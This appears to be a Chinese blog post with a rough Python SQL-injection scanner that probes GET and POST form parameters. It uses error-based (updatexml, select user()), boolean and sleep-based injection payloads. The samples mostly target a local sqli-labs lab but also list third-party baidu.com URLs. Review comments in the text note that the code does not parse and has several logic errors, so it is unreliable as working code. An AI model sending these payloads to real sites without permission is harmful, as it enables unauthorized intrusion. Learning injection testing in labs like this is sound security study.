漏洞扫描器–无验证码的sql注入扫描

本人原本是不想写 SQL 注入相关代码的：个人在实际操作中都是直接改 sqlmap 来跑。但想到以后在实际应用中可能要跑一些有验证的情况下的注入，先写这个作为下一篇的铺垫。

payload 与判别逻辑还极其不完善（这也是个人不愿意写这部分的重要原因：需要考虑和处理的情况太多，宁愿每次遇到实际目标时直接改具体代码来跑）。

#coding=utf-8
import requests
import re
import time
class Sql_Inject(object):
    """Crude SQL-injection probe for one URL (GET query string or POST form).

    Three families of test requests are sent per parameter and a counter is
    bumped whenever the response behaves as the heuristic expects: an error
    substring is found in the body, a pair of responses differs, or a request
    takes long. From a defender's view, the first family only fires when raw
    database error text is echoed back to the client.
    NOTE(review): as written the module does not parse (two syntax errors in
    Inject) and several names are used before being defined, so the counter
    is never computed, returned or stored; treat this as a sketch.
    """
    def __init__(self,data_dict):
        """Read the scan configuration from *data_dict*.

        Keys read: "url" (target), "data" (stored but never used) and
        "head_option" ("get" or "post", compared case-insensitively).
        Raises KeyError if any of the three keys is missing.
        """
        self.url=data_dict["url"]
        self.data=data_dict["data"]
        self.head_option=data_dict["head_option"]
        self.note=[""]  # NOTE(review): never read anywhere in this class
        # Error-based probes: payload -> substring searched for in the
        # response body after the payload is placed in a parameter.
        self.fuzz_payloads={"'":"SQL syntax",\
                            "'+and+updatexml(0x3a,concat(1,(select user())),1)--+-":"XPATH syntax error"}
    def run(self):
        """Entry point: dispatch on the configured request method."""
        self.judge_method()
    def deal_(self):
        """Placeholder; intentionally does nothing."""
        pass
    def judge_method(self):
        """Collect the parameters to test and hand them to Inject().

        GET: the query string of self.url is split into a dict.
        POST: self.url is fetched and every ``<input ... name=...>`` of a
        form whose tag mentions "post"/"POST" becomes a key with an empty
        value.
        NOTE(review): in the GET branch ``params`` is never defined before
        ``params.update`` is called, so that path raises NameError.
        """
        if self.head_option.lower()=="get":
            # e.g. http://www.baidu.com/index.php?id=1&pid=2&gid=2
            if "&" in self.url:
                temp_1=self.url.split("&")
                # print(temp_1)
                # Drop scheme/path from the first element, keeping "id=1".
                temp_1[0]=temp_1[0].split("?")[1]
                GET_parameters=temp_1
                # print(GET_parameters)
                for i in GET_parameters:
                    temp_params = i.split("=")[0]
                    # This branch keeps the real value from the URL ...
                    params.update({temp_params: i.split("=")[1]})
            # e.g. http://www.baidu.com/index.php?id=1
            else:
                GET_parameters=self.url.split("?")[1]
                temp_params=GET_parameters.split("=")[0]
                # ... while this one blanks it; the two branches disagree.
                params.update({temp_params:""})
                # print(GET_parameters)
            # Hand the parameter dict to the probing routine.
            self.Inject(self.url,params)
        else:
            # POST: fetch the page and turn its form fields into a dict.
            s=requests.get(self.url)  # NOTE(review): no timeout, unlike every request in Inject
            rep1  = re.findall("form action.*?post",s.text)
            rep2 = re.findall("form action.*?POST", s.text)
            if rep1 or rep2:
                # str() of the bytes body yields its repr ("b'...'"), which is
                # presumably why this non-DOTALL pattern can span what were
                # newlines — confirm before relying on it.
                res1=re.findall("<form.*?</form>",str(s.content))
                # print(s.text)
                """
                <form action="" name="form1" method="post">
                <div style="margin-top:15px; height:30px;">Username :    
                <input type="text"  name="uname" value=""/></div><div> Password  :    
                <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;">
                <input type="submit" name="submit" value="Submit" /></div>
                </form>
                """
                # print(res1)
                for i in res1:
                    res2=re.findall("<input.*?>",i)
                    post_data=dict()
                    for j in res2:
                        # print(type(j))
                        ss=j.split(" ")
                        # print(ss)
                        """
                        ['<input', 'type="text"', '', 'name="uname"', 'value=""/>']
                        ['<input', 'type="text"', 'name="passwd"', 'value=""/>']
                        ['<input', 'type="submit"', 'name="submit"', 'value="Submit"', '/>']
                        """
                        # Any attribute token containing "name" (a substring
                        # test, not an attribute-name test) yields a key.
                        for x in ss:
                            if "name" in x:
                                x = x.split("=")[1].strip("\"").strip("'")
                                post_data.update({x: ""})
                    print(post_data)
                    # NOTE(review): dict.pop returns the popped value (the
                    # string ""), not the dict, so Inject receives a str here;
                    # pop also raises KeyError for forms with no "submit" field.
                    self.Inject(self.url,post_data.pop("submit"))
                    # POST probing happens inside Inject.
            # print(s.text)
    def Inject(self,url,post_data):
        """Send the probe requests for every key of *post_data* and tally hits.

        Per key, three passes: (1) each entry of self.fuzz_payloads is placed
        in the parameter and the body is searched for the expected substring;
        (2) two requests carrying the same fixed payload are compared;
        (3) one request with a fixed payload is timed. Each hit increments
        ``assign_weight``.
        NOTE(review): this method does not parse (the first loop header and
        the ``if key1=key2`` line are syntax errors) and ``assign_weight`` is
        never initialised; nothing is returned or stored, so the caller gets
        no verdict. The ``url`` parameter is ignored in favour of self.url.
        """
        target = url  # NOTE(review): unused; every request below uses self.url
        # NOTE(review): syntax error — tuple unpacking needs a comma here.
        for key1.value1 in post_data.items():
            temp_target = self.url  # unused
            temp_payload = ""  # unused
            # Pass 1: error-based probes.
            for payload, result in self.fuzz_payloads.items():
                for key2, value2 in post_data.items():
                    # NOTE(review): syntax error — assignment where a
                    # comparison is intended.
                    if key1=key2:
                        post_data.update({key1: payload})
                if self.head_option.lower()=="post":
                    post_data.update({"submit":"submit"})
                    rep = requests.post(url=self.url, data=post_data, timeout=6)
                else:
                    rep = requests.get(url=self.url, params=post_data, timeout=6)
                # print(rep.text)
                # Count a hit if the expected substring appears in the body.
                if result in rep.text:
                    # NOTE(review): assign_weight has no initial value.
                    assign_weight = assign_weight + 1
                # print(assign_weight)
            payload = "'+and+'1'='2'--%20-"
            # NOTE(review): KeyError on the GET path — "submit" is only ever
            # added in the POST branch above.
            post_data.pop("submit")
            # Pass 2: crude boolean check.
            # NOTE(review): iterating a dict yields keys only, so this 2-tuple
            # unpacking fails for any key not exactly two characters long; on
            # the POST path adding "submit" also changes the dict's size
            # mid-iteration.
            for key, value in post_data:
                post_data.update({key: payload})
                if self.head_option.lower()=="post":
                    post_data.update({"submit":"submit"})
                    before_text = requests.post(url=self.url, data=post_data, timeout=6)
                    after_text = requests.post(url=self.url, data=post_data, timeout=6)
                else:
                    before_text = requests.get(url=self.url, params=post_data, timeout=6)
                    after_text = requests.get(url=self.url, params=post_data, timeout=6)
                # NOTE(review): both requests carry the identical payload, so
                # there is no baseline to compare against; and the operands
                # are Response objects rather than their text, presumably
                # compared by identity, which makes this branch fire every time.
                if before_text != after_text:
                    assign_weight = assign_weight + 1
            # Pass 3: crude timing check.
            payload = "s8323'+or+sleep(10)--%20-"
            # NOTE(review): "submit" was already popped above; this second pop
            # raises KeyError unless the POST branch re-added it.
            post_data.pop("submit")
            for key, value in post_data:
                post_data.update({key: payload})
                strat_time = time.time()  # (sic) wall-clock start of the request
                if self.head_option.lower()=="post":
                    post_data.update({"submit":"submit"})
                    rep = requests.post(url=self.url, data=post_data, timeout=6)
                else:
                    rep = requests.get(url=self.url, params=post_data, timeout=6)
                # NOTE(review): timeout=6 aborts a slow request with an
                # uncaught exception before 10 s can elapse, so this branch is
                # unreachable; a delayed response surfaces as a crash, not a hit.
                if time.time() - strat_time > 10:
                    assign_weight = assign_weight + 1
            # print(assign_weight)
# Sample targets; only url_3 is actually used (via data_dict below).
url_1="http://www.baidu.com/index.php?id=1"
url="http://www.baidu.com/index.php?id=1&pid=2&gid=3"
url_2="http://192.168.85.136:9096/sqli-labs-master/Less-1/?id=1"
url_3="http://192.168.85.136:9096/sqli-labs-master/Less-11/"
# "data" is stored by __init__ but never read; "head_option" selects the branch.
data_dict={"url":url_3,"data":"","head_option":"post"}
# NOTE(review): runs at import time (no __main__ guard) and sends requests to
# whatever host data_dict["url"] names; no result is returned or printed.
Sql_Inject(data_dict).run()

2019.6.10